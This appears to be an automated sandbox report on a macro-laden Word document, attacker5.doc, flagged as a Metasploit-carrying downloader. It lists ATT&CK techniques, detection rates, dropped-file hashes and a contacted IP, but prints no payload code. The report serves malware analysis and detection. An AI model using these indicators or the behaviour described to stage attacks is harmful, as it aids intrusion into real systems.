Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pspluginwkr.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation

Remote Access Functionality:

Yara detected MetasploitPayload
Source: Yara match | File source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Command and Scripting Interpreter 111 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 21 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 11 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Security Account Manager | Virtualization/Sandbox Evasion 21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell 3 | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 22 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Information Discovery 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
attacker5.doc | 49% | Virustotal |
attacker5.doc | 40% | Metadefender |
attacker5.doc | 45% | ReversingLabs | Document-Word.Downloader.Heuristic
attacker5.doc | 100% | Avira | HEUR/Macro.Agent
attacker5.doc | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP | 100% | Avira | HEUR/Macro.Downloader.YPA.Gen
C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP | 100% | Joe Sandbox ML |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.piriform.com/ccleaner | powershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmp | false | | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
176.103.56.89 | unknown | Ukraine | 48031 | XSERVER-IP-NETWORK-ASUA | false

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 522199
Start date: 15.11.2021
Start time: 19:26:59
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: attacker5.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.expl.evad.winDOC@5/15@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 6
• Number of non-executed functions: 2
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target powershell.exe, PID 1292 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
19:28:18 | API Interceptor | 94x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

ASN

Match | Associated Sample Name / URL | Detection | Context
XSERVER-IP-NETWORK-ASUA | tgduMePOh0.exe | malicious | 91.213.8.130
XSERVER-IP-NETWORK-ASUA | y2N49ht6t4.exe | malicious | 91.207.60.48
XSERVER-IP-NETWORK-ASUA | 2f50000.exe | malicious | 91.213.8.130
XSERVER-IP-NETWORK-ASUA | C++ Dropper.exe | malicious | 176.103.61.84
XSERVER-IP-NETWORK-ASUA | rGnw6yNeQi.exe | malicious | 176.103.61.84
XSERVER-IP-NETWORK-ASUA | yHvyuzaSkP.exe | malicious | 91.207.61.175
XSERVER-IP-NETWORK-ASUA | V0YCf551dR.exe | malicious | 91.213.8.130
XSERVER-IP-NETWORK-ASUA | Scanned_from_a_Xerox_Multifunction_Printer.doc | malicious | 91.213.8.101
XSERVER-IP-NETWORK-ASUA | Scanned_from_a_Xerox_Multifunction_Printer.doc | malicious | 91.213.8.101
XSERVER-IP-NETWORK-ASUA | RFQ_21032018.doc | malicious | 91.213.8.30

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 23040
Entropy (8bit): 4.912483360778795
Encrypted: false
SSDEEP: 384:NtH/63RV2pg0jm4SrooEpqYOhaRZmqoWBC0h6NsIPCht5p:63nvv4SrooEEYOQRZdoWBC0hGsIPYt5p
MD5: DCA730E5601626A16C51196137FC916A
SHA1: 0789C0C1497DAE228DBFE37A9CB912DC1826E541
SHA-256: 8CCA2398435027C4EF370864C84074C518FEBE88A63EE12B257196A33FCF6267
SHA-512: 6FB3A6072740646D392A4A730558C126B515CFF15A63B4D0B6DA8439FF9CE4E0B13EEAD3814292F78DCA5BA19BB76164AD5CF1FAD09A5E6FA0A4E2D84DD70E43
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A7C03B-9CB7-46B2-8DC4-5DC849FD423A}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 147284
Entropy (8bit): 4.421645694351142
Encrypted: false
SSDEEP: 1536:C8CL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CBJNSc83tKBAvQVCgOtmXmLpLmB
MD5: A0D41E336E4FDD1C31A9124DCBCC3FCB
SHA1: 13D2B12155B9A670A51CE481DF8F01311B3C1C46
SHA-256: B5E1B8E19C988B7CFE5DFD19DA705870288F507CA7AA21601C7C81D7CC0F54F3
SHA-512: 6313726A66F844F516FA7EB952FB31E9CBE878D678B441CC7F17ABBF3B03EEFD4AEAFF52D80DA86CA63BF60DF3F485D278F5B782AF447EF362552869B98B767C
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\~DF392CA3D6DBFBE1F2.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\~DF57A40270983B8D7F.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 47104
Entropy (8bit): 4.538578220627429
Encrypted: false
SSDEEP: 768:pTU91y2uPcuPrL1rEYO2JoT6RCE+6ZRZdoWBC0hGsIPYtfp:pTUynhr/JoT6RCEEWWj0f
MD5: 5EE24DA34FCA949C8E3242B150761755
SHA1: C99AF28F251407D04CDEC491D36A91410E60C91E
SHA-256: 99113D7E01915005DB4B5C016B6C725CE5E0B491A8363A92B06FA67D4C812D13
SHA-512: 70E0B534324374C42CA668179D7ABD441A3B981CA3DC611E66FBEC4ED3FBE5F72A96C2582EBC193635D7AA41BE353BB0A7C44422004EEE7F9453F19BD836927F
Malicious: true
Yara Hits:
• Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
C:\Users\user\AppData\Local\Temp\~DF93C02D3A080000CF.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 11264
Entropy (8bit): 4.511412228552242
Encrypted: false
SSDEEP: 192:/y7pqfCYaORf9eT7NVdccYJqvgWr40C0l76WkdsIPxoht0p:cpqYOhaRZmqoWBC0h6NsIPCht0p
MD5: 6B3E9828C22633A3CBD0E5B776C0EA2D
SHA1: 4A8491468FA72132E0289E1DA0A7E84CBA63A4C5
SHA-256: 843017F22D1F53D8282545DE7478D52F3FD13A834B236D45733C6ADA77DD2AFE
SHA-512: 931722DD3F9DD35F549574EAEFBF652BF553A6F063082DE604F83F4A858FB6A081CF82E9F1A17C8275A152A743583B1440526366E73B7FC29D6BC074DD0A0B8C
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\attacker5.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Tue Nov 16 02:28:12 2021, length=43008, window=hide
Category: dropped
Size (bytes): 1009
Entropy (8bit): 4.51023198489696
Encrypted: false
SSDEEP: 24:8Zw/XTKz3cYm7oireTYLhyDv3qTaQd7Qy:8a/XTKbBm8irIYFBOUj
MD5: 0F0BCF3C449DE213830328259C67D412
SHA1: 0E4E4A0AA02EAE2CC5573FD8685794726500D590
SHA-256: 50A8050D598001FB4FE645088BEF9C3F041F96D1BBBD96F52A8AF0B0F070976A
SHA-512: DCB90A1F7107CE802E2EC78443A59B1CCEF89FBFC5B57BF6B3CF04F73B593AC1911841E6A4D7A7709288E3BF79FB9AC1D481005681C95441B8FDF9C600D92503
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 69
Entropy (8bit): 4.484070798959447
Encrypted: false
SSDEEP: 3:bDuMJlcRiZFXCmX1cOFXCv:bCBiZBmOBs
MD5: 92458470D1EFB1A1045D2733BF4E1F5C
SHA1: F413219181EA4E8432642F944A6F8699B3C052C7
SHA-256: 5C17666DA34EA8C5B5E5E73192B3C71E9A944B216A2C5F423996046847748007
SHA-512: 0A79B4D3EA7A1744522AC08A6320EF8B0421EB77B7330E6F9A8A6E20B5482BBC3F725A11FCACB1322259ACABE7C099E4C5B2C95FEAB50E569CE423D1567C748F
Malicious: false
Preview: [folders]..Templates.LNK=0..attacker5.LNK=0..[doc]..attacker5.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3EUAMEHPTLTEJH1AS88K.temp
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5818823994431517
Encrypted: false
SSDEEP: 96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzxoKr+HDpxpyD0lUVqA2:cy+ooz8yWHnoruzxx2f8DqA2
MD5: 52ED5BCA62D6E8B44FF8C19254D238A7
SHA1: E74EA58976A264F54266C5DB6A5552374AACAC06
SHA-256: 935731D3E60C8296A3F4504917CA4DE6D2C4E93A54520801F734541A23E3DF6F
SHA-512: B494B478862C3064F4B542F550DB08A0E615ABF85EFFF04AFBD00611EB7AE90C78E2B06FB9A0EE8269FAA8B62D25DEED9084B62C93E29522DA59D3485A09950B
Malicious: false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5799033057552143
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzeoY0HDF2D0lUVqA2:cy+ooz8yWHnoruzecF2DqA2
        MD5:71F8B05527247274055E9981AEFC96D8
        SHA1:72E2976B32B3F9A71C6599D190B13F067C8D73D5
        SHA-256:026B25B0198E2D09FF7AEA61797959F7B539090B69F5C19571FC494C953438A6
        SHA-512:52BD6CF5417668886F5D218FD5B0E8F65F53520453B4E33FCAF80D42F1C850A9466295ADE06372B2CAA77E06CF9DA98C25AE41D713D52D9445778C8367CD9B88
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H8RTSPYLHIEB5H6HBIZB.temp
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5799033057552143
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzeoY0HDF2D0lUVqA2:cy+ooz8yWHnoruzecF2DqA2
        MD5:71F8B05527247274055E9981AEFC96D8
        SHA1:72E2976B32B3F9A71C6599D190B13F067C8D73D5
        SHA-256:026B25B0198E2D09FF7AEA61797959F7B539090B69F5C19571FC494C953438A6
        SHA-512:52BD6CF5417668886F5D218FD5B0E8F65F53520453B4E33FCAF80D42F1C850A9466295ADE06372B2CAA77E06CF9DA98C25AE41D713D52D9445778C8367CD9B88
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5818823994431517
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzxoKr+HDpxpyD0lUVqA2:cy+ooz8yWHnoruzxx2f8DqA2
        MD5:52ED5BCA62D6E8B44FF8C19254D238A7
        SHA1:E74EA58976A264F54266C5DB6A5552374AACAC06
        SHA-256:935731D3E60C8296A3F4504917CA4DE6D2C4E93A54520801F734541A23E3DF6F
        SHA-512:B494B478862C3064F4B542F550DB08A0E615ABF85EFFF04AFBD00611EB7AE90C78E2B06FB9A0EE8269FAA8B62D25DEED9084B62C93E29522DA59D3485A09950B
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\Desktop\~$tacker5.doc
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.5038355507075254
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
        Malicious:false
        Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

        Static File Info

        General

        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: sales, Template: Normal, Last Saved By: salesdepartmentx@outlook.com, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 06:00, Create Time/Date: Tue Nov 2 00:53:00 2021, Last Saved Time/Date: Tue Nov 2 02:01:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
        Entropy (8bit):4.148559492041284
        TrID:
        • Microsoft Word document (32009/1) 54.23%
        • Microsoft Word document (old ver.) (19008/1) 32.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
        File name:attacker5.doc
        File size:41472
        MD5:4ac3d0835c1650e2ec73c8607d55ed1d
        SHA1:ad6ebde97a0f082cfc812f5f99ecb83b0c4caf4b
        SHA256:55c9ff8f829bf0d5bbec83127570ad149bd18bc0351c59933090af917b4451db
        SHA512:c9805bdfdd5494e51529fbd4123e4b8be2acb8323185e07dd36e3a8b570c5eb8242077ed28f4ee122ccd01b3836202a3ec5da5ba70b90b22f24329b183919714
        SSDEEP:768:GMxw+tOOA8v4SV4mjEYOQRZdoWBC0hGsIPYtD:bxrt2SV42MWWj0D
        File Content Preview:........................>.......................'...........)...............&..................................................................................................................................................................................

        File Icon

        Icon Hash:e4eea2aaa4b4b4a4

        Static OLE Info

        General

        Document Type:OLE
        Number of OLE Files:1

        OLE File "attacker5.doc"

        Indicators

        Has Summary Info:True
        Application Name:Microsoft Office Word
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:True

        Summary

        Code Page:1252
        Title:
        Subject:
        Author:sales
        Keywords:
        Template:Normal
        Last Saved By:salesdepartmentx@outlook.com
        Revision Number:5
        Total Edit Time:360
        Create Time:2021-11-02 00:53:00
        Last Saved Time:2021-11-02 02:01:00
        Number of Pages:1
        Number of Words:0
        Number of Characters:0
        Creating Application:Microsoft Office Word
        Security:0

        Document Summary

        Document Code Page:1252
        Number of Lines:0
        Number of Paragraphs:0
        Thumbnail Scaling Desired:False
        Company:
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:1048576

        Streams with VBA

